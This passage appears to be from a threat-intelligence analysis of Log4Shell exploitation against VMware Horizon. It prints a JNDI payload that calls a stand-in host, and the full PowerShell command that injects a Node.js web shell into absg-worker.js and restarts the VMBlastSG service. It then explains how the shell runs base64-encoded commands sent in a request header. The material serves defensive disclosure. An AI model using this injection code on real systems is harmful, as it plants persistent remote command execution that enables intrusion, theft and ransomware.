The attack is very likely initiated via a Log4Shell payload similar to ${jndi:ldap://example.com}. The payload exploits the Log4Shell vulnerability (CVE-2021-44228 in the Log4j library) through the Apache Tomcat service embedded within VMware Horizon. Successful exploitation launches the following PowerShell command, spawned as a child process of ws_TomcatService.exe:
powershell -c "$path=gwmi win32_service|?{$_.Name -like """VMBlastSG"""}|%{$_.PathName -replace '"""', '' -replace """nssm.exe""","""lib\absg-worker.js"""};
The executed command invokes Get-WMIObject (gwmi) against the win32_service class and filters for the service named 'VMBlastSG' (the VMware Blast Secure Gateway; -like with no wildcard behaves as an exact, case-insensitive match). It takes that service's PathName, strips the surrounding double quotes, replaces 'nssm.exe' with 'lib\absg-worker.js' and stores the result in $path, thereby deriving the location of the 'absg-worker.js' file for the targeted VMware Horizon instance without having to hardcode the installation directory.
$expr="""req.connection.end();
if(String(req.url).includes('REDACTED')) {try {replyError(req, res, 200, require('child_process').execSync(Buffer.from(req.headers['data'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());}
catch (err) {replyError(req, res, 400, err.stderr.toString());}
return;}""";
This writes a JavaScript block to $expr (the `r`n`t sequences are PowerShell escapes that emit a carriage return, line feed and tabs, so the injected text is written with the same indentation as the surrounding file). Once inserted into the request handler, the block checks whether the request URI contains a specific, hardcoded string (redacted here) and, if so, base64-decodes the value of the 'data' request header and executes it as a command via child_process.execSync. The command output is returned to the attacker through the application's own 'replyError' function with HTTP status 200; if the command fails, the catch block returns status 400 with the command's stderr. Requests that do not contain the string fall through to the service's normal handling.
(Get-Content $path)|ForEach-Object {$_ -replace """req.connection.end()\;""", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG"
Get-Content reads the file at $path (absg-worker.js) line by line; for each line, -replace (a regular-expression substitution) replaces the pattern "req.connection.end()\;" with the code block stored in $expr, and Set-Content writes the modified lines back to the same path, thereby injecting the web shell into the existing request handler. The altered 'absg-worker.js' file then contains:
The 'VMBlastSG' service is then forcibly restarted (Restart-Service -Force) so that the Node.js process reloads the modified file and the listener becomes active.
Once established, the listener will execute arbitrary commands received in crafted web (HTTP / HTTPS) requests if a particular hardcoded string (key) is present in the URI of the request. The commands are carried base64-encoded in a request header named 'data', and their output is returned in the HTTP response. Because the shell lives inside a legitimate, internet-facing VMware service and survives reboots of the service, it gives the attacker a persistent channel from their infrastructure into the Horizon server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.
A representative diagram of the attack is provided below: